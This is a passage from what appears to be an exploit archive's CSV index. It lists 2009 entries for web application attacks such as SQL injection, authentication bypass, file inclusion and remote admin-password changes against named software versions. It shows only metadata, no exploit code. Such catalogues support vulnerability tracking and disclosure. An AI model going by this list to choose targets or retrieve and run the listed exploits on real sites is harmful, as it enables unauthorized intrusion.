Grabber",2009-05-05,SirGod,php,webapps, -8619,exploits/php/webapps/8619.txt,"Joomla! Component Almond Classifieds 5.6.2 - Blind SQL Injection",2009-05-05,InjEctOr5,php,webapps, -8622,exploits/php/webapps/8622.pl,"webSPELL 4.2.0e - 'page' Blind SQL Injection",2009-05-07,DNX,php,webapps, -8626,exploits/php/webapps/8626.txt,"TCPDB 3.8 - Arbitrary Add Admin Account",2009-05-07,Mr.tro0oqy,php,webapps, -8627,exploits/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 - Insecure Cookie Handling",2009-05-07,TiGeR-Dz,asp,webapps, -8635,exploits/php/webapps/8635.txt,"VIDEOSCRIPT.us - Authentication Bypass",2009-05-07,snakespc,php,webapps, -8636,exploits/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps, -8638,exploits/php/webapps/8638.html,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps, -8639,exploits/php/webapps/8639.html,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps, -8642,exploits/php/webapps/8642.txt,"The Recipe Script 5 - Authentication Bypass / Database Backup",2009-05-08,TiGeR-Dz,php,webapps, -8643,exploits/php/webapps/8643.txt,"Realty Web-Base 1.0 - Authentication Bypass",2009-05-08,"ThE g0bL!N",php,webapps, -8645,exploits/php/webapps/8645.txt,"Luxbum 0.5.5/stable - Authentication Bypass",2009-05-08,knxone,php,webapps, -8647,exploits/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps, -8648,exploits/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps, -8649,exploits/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps, -8652,exploits/php/webapps/8652.pl,"EggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps, -8653,exploits/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps, -8654,exploits/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps, -8655,exploits/php/webapps/8655.pl,"microTopic 1 - 'Rating' Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps, -8658,exploits/php/webapps/8658.txt,"PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Injection",2009-05-11,scriptjunkie,php,webapps, -8659,exploits/php/webapps/8659.php,"Bitweaver 2.6 - 'saveFeed()' Remote Code Execution",2009-05-12,Nine:Situations:Group,php,webapps, -8664,exploits/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps, -8667,exploits/php/webapps/8667.txt,"TinyButStrong 3.4.0 - 'script' Local File Disclosure",2009-05-13,ahmadbady,php,webapps, -8668,exploits/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps, -8671,exploits/php/webapps/8671.pl,"Family Connections CMS 1.9 - SQL Injection",2009-05-13,YEnH4ckEr,php,webapps, -8672,exploits/php/webapps/8672.php,"MaxCMS 2.0 - 'm_username' Arbitrary Create Admin",2009-05-13,Securitylab.ir,php,webapps, -8674,exploits/php/webapps/8674.txt,"Mlffat 2.1 - Cookie Authentication Bypass",2009-05-13,Qabandi,php,webapps, -8675,exploits/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps, -8676,exploits/php/webapps/8676.txt,"My Game Script 2.0 - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps, -8679,exploits/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,php,webapps, -8680,exploits/php/webapps/8680.txt,"beLive 0.2.3 - 'arch.php?arch' Local File Inclusion",2009-05-14,Kacper,php,webapps, -8681,exploits/php/webapps/8681.php,"StrawBerry 1.1.1 - Local File Inclusion / Remote Command Execution",2009-05-14,[AVT],php,webapps, -8682,exploits/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps, -8683,exploits/php/webapps/8683.txt,"Submitter Script - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps, -8684,exploits/php/webapps/8684.txt,"MRCGIGUY Hot Links SQL 3.2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps, -8685,exploits/php/webapps/8685.txt,"MRCGIGUY Amazon Directory 1.0/2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps, -8686,exploits/php/webapps/8686.txt,"MRCGIGUY Message Box 1.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps, -8687,exploits/php/webapps/8687.txt,"MRCGIGUY The Ticket System 2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps, -8688,exploits/php/webapps/8688.txt,"MRCGIGUY Ultimate Profit Portal 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps, -8689,exploits/php/webapps/8689.txt,"2DayBiz Business Community Script - Multiple Vulnerabilities",2009-05-14,TiGeR-Dz,php,webapps, -8690,exploits/php/webapps/8690.txt,"Easy Scripts Answer and Question Script - Multiple Vulnerabilities",2009-05-14,InjEctOr5,php,webapps, -8691,exploits/php/webapps/8691.txt,"2DayBiz Template Monster Clone - 'edituser.php' Change Pass",2009-05-14,TiGeR-Dz,php,webapps, -8692,exploits/php/webapps/8692.txt,"MRCGIGUY SimpLISTic SQL 2.0.0 - Insecure Cookie Handling",2009-05-14,"ThE g0bL!N",php,webapps, -8694,exploits/php/webapps/8694.txt,"MRCGIGUY Top Sites 1.0.0 - Insecure Cookie Handling",2009-05-14,"ThE g0bL!N",php,webapps, -8697,exploits/php/webapps/8697.txt,"Joomla! Component ArtForms 2.1 b7 - Remote File Inclusion",2009-05-15,iskorpitx,php,webapps, -8699,exploits/php/webapps/8699.php,"Harland Scripts 11 - Products Remote Command Execution",2009-05-15,G4N0K,php,webapps, -8700,exploits/php/webapps/8700.txt,"Rama CMS 0.9.8 - 'download.php' File Disclosure",2009-05-15,Br0ly,php,webapps, -8702,exploits/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - SQL Injection / Cross-Site Scripting",2009-05-15,snakespc,php,webapps, -8705,exploits/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps, -8706,exploits/php/webapps/8706.pl,"PHPenpals 1.1 - 'mail.php?ID' SQL Injection",2009-05-15,Br0ly,php,webapps, -8707,exploits/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps, -8708,exploits/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps, -8709,exploits/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps, -8710,exploits/php/webapps/8710.txt,"PHP Dir Submit - Authentication Bypass",2009-05-18,snakespc,php,webapps, -8711,exploits/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps, -8713,exploits/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps, -8714,exploits/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin",2009-05-18,ahmadbady,php,webapps, -8715,exploits/php/webapps/8715.txt,"Pluck CMS 4.6.2 - 'langpref' Local File Inclusion",2009-05-18,ahmadbady,php,webapps, -8717,exploits/php/webapps/8717.txt,"ClanWeb 1.4.2 - Remote Change Password / Add Admin",2009-05-18,ahmadbady,php,webapps, -8718,exploits/php/webapps/8718.txt,"douran portal 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps, -8719,exploits/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,asp,webapps, -8724,exploits/php/webapps/8724.txt,"LightOpenCMS 0.1 - 'id' SQL Injection",2009-05-18,Mi4night,php,webapps, -8725,exploits/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution",2009-05-18,Securitylab.ir,php,webapps, -8726,exploits/asp/webapps/8726.txt,"MaxCMS 2.0 - '/inc/ajax.asp' SQL Injection",2009-05-18,Securitylab.ir,asp,webapps, -8727,exploits/php/webapps/8727.txt,"DGNews 3.0 Beta - 'id' SQL Injection",2009-05-18,Cyber-Zone,php,webapps, -8728,exploits/php/webapps/8728.html,"PHP Article Publisher - Remote Change Admin Password",2009-05-18,ahmadbady,php,webapps, -8730,exploits/php/webapps/8730.txt,"VidShare Pro - Arbitrary File Upload",2009-05-19,InjEctOr5,php,webapps, -8731,exploits/php/webapps/8731.php,"Joomla! Component com_gsticketsystem - 'catid' Blind SQL Injection",2009-05-19,InjEctOr5,php,webapps, -8734,exploits/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,asp,webapps, -8735,exploits/php/webapps/8735.txt,"PAD Site Scripts 3.6 - Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps, -8736,exploits/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - SQL Injection",2009-05-19,girex,php,webapps, -8737,exploits/php/webapps/8737.txt,"vidshare pro - SQL Injection / Cross-Site Scripting",2009-05-19,snakespc,php,webapps, -8738,exploits/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injections",2009-05-19,YEnH4ckEr,php,webapps, -8739,exploits/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps, -8740,exploits/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - Blind SQL Injection",2009-05-19,YEnH4ckEr,php,webapps, -8741,exploits/php/webapps/8741.txt,"DM FileManager 3.9.2 - Authentication Bypass",2009-05-19,snakespc,php,webapps, -8743,exploits/php/webapps/8743.txt,"Joomla! Component Casino 0.3.1 - Multiple SQL Injections s",2009-05-20,ByALBAYX,php,webapps, -8744,exploits/php/webapps/8744.txt,"Exjune Officer Message System 1 - Multiple Vulnerabilities",2009-05-20,ByALBAYX,php,webapps, -8745,exploits/php/webapps/8745.txt,"Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting",2009-05-20,ByALBAYX,php,webapps, -8746,exploits/php/webapps/8746.txt,"NC GBook 1.0 - Remote Command Injection",2009-05-20,"ThE g0bL!N",php,webapps, -8747,exploits/php/webapps/8747.txt,"NC LinkList 1.3.1 - Remote Command Injection",2009-05-20,"ThE g0bL!N",php,webapps, -8748,exploits/php/webapps/8748.txt,"Realty Web-Base 1.0 - 'list_list.php?id' SQL Injection",2009-05-20,"ThE g0bL!N",php,webapps, -8749,exploits/asp/webapps/8749.txt,"DMXReady Registration Manager 1.1 - Arbitrary File Upload",2009-05-20,Securitylab.ir,asp,webapps, -8750,exploits/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",php,webapps, -8751,exploits/php/webapps/8751.txt,"bSpeak 1.10 - 'forumid' Blind SQL Injection",2009-05-20,snakespc,php,webapps, -8752,exploits/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps, -8755,exploits/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - Authentication Bypass",2009-05-21,Striker7,php,webapps, -8756,exploits/asp/webapps/8756.txt,"asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting",2009-05-21,Bl@ckbe@rD,asp,webapps, -8759,exploits/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injections",2009-05-21,YEnH4ckEr,php,webapps, -8761,exploits/php/webapps/8761.txt,"Article Directory - Authentication Bypass",2009-05-21,Hakxer,php,webapps, -8762,exploits/php/webapps/8762.txt,"Article Directory - 'page.php' Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps, -8763,exploits/php/webapps/8763.txt,"ZaoCMS - Insecure Cookie Handling",2009-05-21,"ThE g0bL!N",php,webapps, -8764,exploits/php/webapps/8764.txt,"ZaoCMS - 'download.php' Remote File Disclosure",2009-05-21,"ThE g0bL!N",php,webapps, -8766,exploits/php/webapps/8766.txt,"Tutorial Share 3.5.0 - Insecure Cookie Handling",2009-05-22,Evil-Cod3r,php,webapps, -8769,exploits/php/webapps/8769.txt,"ZaoCMS - 'user_id' SQL Injection",2009-05-22,Qabandi,php,webapps, -8771,exploits/php/webapps/8771.html,"ZaoCMS - 'user_updated.php' Remote Change Password",2009-05-22,"ThE g0bL!N",php,webapps, -8773,exploits/php/webapps/8773.txt,"ZaoCMS (PhpCommander) - Arbitrary File Upload",2009-05-22,Qabandi,php,webapps, -8774,exploits/php/webapps/8774.html,"Mole Group Sky Hunter/Bus Ticket Scripts - Change Admin Password",2009-05-22,G4N0K,php,webapps, -8775,exploits/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 - Change Admin Password",2009-05-22,G4N0K,php,webapps, -8776,exploits/php/webapps/8776.txt,"photovideotube 1.11 - Multiple Vulnerabilities",2009-05-22,Hakxer,php,webapps, -8778,exploits/php/webapps/8778.txt,"minitwitter 0.3-beta - SQL Injection / Cross-Site Scripting",2009-05-26,YEnH4ckEr,php,webapps, -8779,exploits/php/webapps/8779.txt,"Joomla! Component Boy Scout Advancement 0.3 - 'id' SQL Injection",2009-05-26,YEnH4ckEr,php,webapps, -8781,exploits/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps, -8784,exploits/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - 'vbplaza.php' Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps, -8785,exploits/asp/webapps/8785.txt,"Cute Editor ASP.NET - Remote File Disclosure",2009-05-26,Securitylab.ir,asp,webapps, -8787,exploits/php/webapps/8787.txt,"MyFirstCMS 1.0.2 - Arbitrary File Delete",2009-05-26,darkjoker,php,webapps, -8788,exploits/php/webapps/8788.txt,"Mole Adult Portal Script - 'profile.php?user_id' SQL Injection",2009-05-26,Qabandi,php,webapps, -8790,exploits/php/webapps/8790.pl,"CPCommerce 1.2.x - 'GLOBALS[prefix]' Arbitrary File Inclusion",2009-05-26,StAkeR,php,webapps, -8791,exploits/php/webapps/8791.txt,"WordPress Plugin Lytebox - 'wp-lytebox' Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps, -8792,exploits/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion",2009-05-26,asL-Sabia,php,webapps, -8793,exploits/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Authentication Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps, -8795,exploits/php/webapps/8795.html,"Ultimate Media Script 2.0 - Remote Change Content",2009-05-26,"ThE g0bL!N",php,webapps, -8796,exploits/php/webapps/8796.html,"Gallarific - 'user.php' Arbirary Change Admin Information",2009-05-26,TiGeR-Dz,php,webapps, -8797,exploits/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps, -8801,exploits/php/webapps/8801.txt,"Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor",2009-05-26,"Jan Van Niekerk",php,webapps, -8802,exploits/php/webapps/8802.txt,"Kensei Board 2.0.0b - Multiple SQL Injections",2009-05-26,cOndemned,php,webapps, -8803,exploits/php/webapps/8803.txt,"MyForum 1.3 - Authentication Bypass",2009-05-26,"ThE g0bL!N",php,webapps, -8805,exploits/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Configuration File Disclosure",2009-05-26,DarkbiteX,php,webapps, -8807,exploits/php/webapps/8807.html,"ShaadiClone 2.0 - 'addAdminmembercode.php' Arbitrary Add Admin",2009-05-26,x.CJP.x,php,webapps, -8808,exploits/php/webapps/8808.txt,"phpBugTracker 1.0.3 - Authentication Bypass",2009-05-26,ByALBAYX,php,webapps, -8809,exploits/php/webapps/8809.html,"ZeeCareers 2.0 - 'addAdminmembercode.php' Arbitrary Add Admin",2009-05-26,x.CJP.x,php,webapps, -8810,exploits/php/webapps/8810.txt,"WebMember 1.0 - 'formID' SQL Injection",2009-05-26,KIM,php,webapps, -8811,exploits/php/webapps/8811.txt,"Joomla! Component Com_Agora 3.0.0 RC1 - Arbitrary File Upload",2009-05-26,ByALBAYX,php,webapps, -8812,exploits/php/webapps/8812.txt,"Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion",2009-05-26,Nine:Situations:Group,php,webapps, -8813,exploits/php/webapps/8813.txt,"Million Dollar Text Links 1.x - Insecure Cookie Handling",2009-05-27,HxH,php,webapps, -8814,exploits/php/webapps/8814.txt,"Joomla! Component AgoraGroup 0.3.5.3 - Blind SQL Injection",2009-05-27,"Chip d3 bi0s",php,webapps, -8815,exploits/php/webapps/8815.txt,"Easy Px 41 CMS 09.00.00B1 - 'fiche' Local File Inclusion",2009-05-27,"ThE g0bL!N",php,webapps, -8816,exploits/php/webapps/8816.txt,"SiteX 0.7.4.418 - 'THEME_FOLDER' Local File Inclusion",2009-05-27,ahmadbady,php,webapps, -8817,exploits/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 - 'cat_id' SQL Injection",2009-05-27,taRentReXx,php,webapps, -8818,exploits/php/webapps/8818.txt,"Impact Software AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection",2009-05-27,intern0t,php,webapps, -8819,exploits/php/webapps/8819.txt,"small pirate 2.1 - Cross-Site Scripting / SQL Injection",2009-05-29,YEnH4ckEr,php,webapps, -8820,exploits/php/webapps/8820.txt,"amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection",2009-05-29,intern0t,php,webapps, -8821,exploits/php/webapps/8821.txt,"Joomla! Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps, -8823,exploits/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps, -8825,exploits/php/webapps/8825.txt,"Zen Help Desk 2.1 - Authentication Bypass",2009-05-29,TiGeR-Dz,php,webapps, -8827,exploits/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps, -8828,exploits/php/webapps/8828.txt,"Arab Portal 2.2 - Authentication Bypass",2009-05-29,"sniper code",php,webapps, -8829,exploits/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' SQL Injection",2009-05-29,Br0ly,php,webapps, -8830,exploits/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps, -8831,exploits/php/webapps/8831.txt,"Traidnt Up 2.0 - Cookie Authentication Bypass",2009-05-29,Qabandi,php,webapps, -8834,exploits/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - 'seller' SQL Injection",2009-06-01,Br0ly,php,webapps, -8836,exploits/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injections",2009-06-01,"Nico Leidecker",php,webapps, -8838,exploits/php/webapps/8838.txt,"elitecms 1.01 - SQL Injection / Cross-Site Scripting",2009-06-01,xeno_hive,php,webapps, -8839,exploits/php/webapps/8839.txt,"Open-school 1.0 - 'id' SQL Injection",2009-06-01,OzX,php,webapps, -8840,exploits/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 - 'tid' Blind SQL Injection",2009-06-01,OzX,php,webapps, -8841,exploits/php/webapps/8841.txt,"unclassified NewsBoard 1.6.4 - Multiple Vulnerabilities",2009-06-01,girex,php,webapps, -8843,exploits/php/webapps/8843.pl,"Online Grades & Attendance 3.2.6 - Credentials Changer SQL",2009-06-01,YEnH4ckEr,php,webapps, -8844,exploits/php/webapps/8844.txt,"Online Grades & Attendance 3.2.6 - Multiple SQL Injections",2009-06-01,YEnH4ckEr,php,webapps, -8847,exploits/php/webapps/8847.txt,"Joomla! Component Joomlaequipment (com_juser) 2.0.4 - SQL Injection",2009-06-01,"Chip d3 bi0s",php,webapps, -8848,exploits/php/webapps/8848.txt,"ecsportal rel 6.5 - 'article_view_photo.php?id' SQL Injection",2009-06-01,taRentReXx,php,webapps, -8849,exploits/asp/webapps/8849.txt,"R2 NewsLetter Lite/Pro/Stats - 'admin.mdb' Database Disclosure",2009-06-01,TiGeR-Dz,asp,webapps, -8850,exploits/php/webapps/8850.txt,"PAD Site Scripts 3.6 - Arbitrary Database Backup",2009-06-01,TiGeR-Dz,php,webapps, -8851,exploits/php/webapps/8851.txt,"AdaptBB 1.0 - 'forumspath' Remote File Inclusion",2009-06-01,"Mehmet Ince",php,webapps, -8852,exploits/php/webapps/8852.txt,"ASP Football Pool 2.3 - Remote Database Disclosure",2009-06-01,ByALBAYX,php,webapps, -8853,exploits/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 - Multiple Local File Inclusions",2009-06-02,YEnH4ckEr,php,webapps, -8854,exploits/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 - Blind SQL Injection",2009-06-02,YEnH4ckEr,php,webapps, -8855,exploits/php/webapps/8855.txt,"Alstrasoft Article Manager Pro - Arbitrary File Upload",2009-06-02,ZoRLu,php,webapps, -8856,exploits/php/webapps/8856.txt,"flashlight free edition - Local File Inclusion / SQL Injection",2009-06-02,K4m1k451,php,webapps, -8857,exploits/php/webapps/8857.txt,"WebCal - 'webCal3_detail.asp?event_id' SQL Injection",2009-06-02,Bl@ckbe@rD,php,webapps, -8858,exploits/php/webapps/8858.txt,"propertymax pro free - SQL Injection / Cross-Site Scripting",2009-06-02,SirGod,php,webapps, -8859,exploits/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp?mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps, -8860,exploits/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps, -8864,exploits/php/webapps/8864.txt,"My Mini Bill - 'orderid' SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps, -8865,exploits/php/webapps/8865.txt,"EgyPlus 7ml 1.0.1 - Authentication Bypass",2009-06-03,Qabandi,php,webapps, -8866,exploits/php/webapps/8866.php,"Podcast Generator 1.2 - Unauthorized Re-Installation",2009-06-03,StAkeR,php,webapps, -8867,exploits/php/webapps/8867.pl,"Joomla! Component Seminar 1.28 - 'id' Blind SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps, -8868,exploits/php/webapps/8868.txt,"OCS Inventory NG 1.02 - Remote File Disclosure",2009-06-03,"Nico Leidecker",php,webapps, -8869,exploits/php/webapps/8869.txt,"Supernews 2.6 - 'index.php?noticia' SQL Injection",2009-06-03,DD3str0y3r,php,webapps, -8870,exploits/php/webapps/8870.txt,"Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion",2009-06-03,ByALBAYX,php,webapps, -8871,exploits/php/webapps/8871.txt,"Movie PHP Script 2.0 - 'init.php?anticode' Code Execution",2009-06-03,SirGod,php,webapps, -8872,exploits/php/webapps/8872.txt,"Joomla! Component com_mosres - Multiple SQL Injections",2009-06-03,"Chip d3 bi0s",php,webapps, -8874,exploits/php/webapps/8874.txt,"SuperCali PHP Event Calendar - Arbitrary Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps, -8876,exploits/php/webapps/8876.html,"Web Directory PRO - 'Admins.php' Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps, -8877,exploits/php/webapps/8877.txt,"Host Directory PRO 2.1.0 - Remote Database Backup",2009-06-04,ZoRLu,php,webapps, -8878,exploits/php/webapps/8878.txt,"Web Directory PRO - Remote Database Backup",2009-06-04,TiGeR-Dz,php,webapps, -8879,exploits/php/webapps/8879.html,"Host Directory PRO 2.1.0 - Remote Change Admin Password",2009-06-04,TiGeR-Dz,php,webapps, -8882,exploits/php/webapps/8882.txt,"Pixelactivo 3.0 - 'idx' SQL Injection",2009-06-05,snakespc,php,webapps, -8883,exploits/php/webapps/8883.txt,"Pixelactivo 3.0 - Authentication Bypass",2009-06-05,"ThE g0bL!N",php,webapps, -8884,exploits/php/webapps/8884.txt,"Kjtechforce mailman b1 - Delete Row 'code' SQL Injection",2009-06-05,YEnH4ckEr,php,webapps, -8885,exploits/php/webapps/8885.pl,"Kjtechforce mailman b1 - 'dest' Blind SQL Injection",2009-06-05,YEnH4ckEr,php,webapps, -8886,exploits/php/webapps/8886.txt,"MyCars Automotive - Authentication Bypass",2009-06-08,snakespc,php,webapps, -8889,exploits/asp/webapps/8889.txt,"VT-Auth 1.0 - 'zHk8dEes3.txt' File Disclosure",2009-06-08,ByALBAYX,asp,webapps, -8890,exploits/asp/webapps/8890.txt,"FipsCMS Light 2.1 - 'db.mdb' Remote Database Disclosure",2009-06-08,ByALBAYX,asp,webapps, -8891,exploits/php/webapps/8891.txt,"Joomla! Component com_school 1.4 - 'classid' SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps, -8892,exploits/php/webapps/8892.txt,"Virtue Classifieds - 'category' SQL Injection",2009-06-08,OzX,php,webapps, -8893,exploits/php/webapps/8893.txt,"Virtue Book Store - 'cid' SQL Injection",2009-06-08,OzX,php,webapps, -8894,exploits/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps, -8895,exploits/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps, -8898,exploits/php/webapps/8898.txt,"Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps, -8900,exploits/php/webapps/8900.txt,"Frontis 3.9.01.24 - 'source_class' SQL Injection",2009-06-08,snakespc,php,webapps, -8901,exploits/php/webapps/8901.txt,"virtue news - SQL Injection / Cross-Site Scripting",2009-06-08,snakespc,php,webapps, -8902,exploits/php/webapps/8902.html,"Grestul 1.2 - Remote Add Administrator Account",2009-06-08,"ThE g0bL!N",php,webapps, -8903,exploits/php/webapps/8903.txt,"DM FileManager 3.9.2 - Insecure Cookie Handling",2009-06-08,"ThE g0bL!N",php,webapps, -8904,exploits/php/webapps/8904.txt,"Automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,php,webapps, -8905,exploits/php/webapps/8905.txt,"Joomla! Component com_portafolio - 'cid' SQL Injection",2009-06-08,"Chip d3 bi0s",php,webapps, -8906,exploits/php/webapps/8906.pl,"Shop Script Pro 2.12 - SQL Injection",2009-06-08,Ams,php,webapps, -8908,exploits/php/webapps/8908.txt,"Joomla! Component BookLibrary 1.5.2.4 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps, -8911,exploits/php/webapps/8911.txt,"Joomla! Component Akobook 2.3 - 'gbid' SQL Injection",2009-06-09,Ab1i,php,webapps, -8912,exploits/php/webapps/8912.txt,"Joomla! Component com_media_library 1.5.3 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps, -8913,exploits/php/webapps/8913.txt,"S-CMS 2.0b3 - Multiple Local File Inclusions",2009-06-09,YEnH4ckEr,php,webapps, -8914,exploits/php/webapps/8914.txt,"S-CMS 2.0b3 - Multiple SQL Injections",2009-06-09,YEnH4ckEr,php,webapps, -8915,exploits/php/webapps/8915.pl,"S-CMS 2.0b3 - 'Username' Blind SQL Injection",2009-06-09,YEnH4ckEr,php,webapps, -8917,exploits/php/webapps/8917.txt,"mrcgiguy the ticket system 2.0 PHP - Multiple Vulnerabilities",2009-06-09,"ThE g0bL!N",php,webapps, -8918,exploits/php/webapps/8918.txt,"MRCGIGUY Hot Links - 'report.php?id' SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps, -8919,exploits/php/webapps/8919.txt,"Joomla! Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps, -8920,exploits/php/webapps/8920.txt,"Joomla! Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps, -8921,exploits/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian _pagvac_ Pastor",php,webapps, -8923,exploits/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Configuration Disclosure",2009-06-10,StAkeR,php,webapps, -8924,exploits/php/webapps/8924.txt,"School Data Navigator - 'page' Local/Remote File Inclusion",2009-06-10,Br0ly,php,webapps, -8925,exploits/php/webapps/8925.txt,"Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps, -8926,exploits/php/webapps/8926.txt,"mrcgiguy freeticket - Cookie Handling / SQL Injection",2009-06-10,"ThE g0bL!N",php,webapps, -8927,exploits/php/webapps/8927.pl,"Open Biller 0.1 - 'Username' Blind SQL Injection",2009-06-10,YEnH4ckEr,php,webapps, -8928,exploits/php/webapps/8928.txt,"PHPWebThings 1.5.2 - 'help.php?module' Local File Inclusion",2009-06-11,Br0ly,php,webapps, 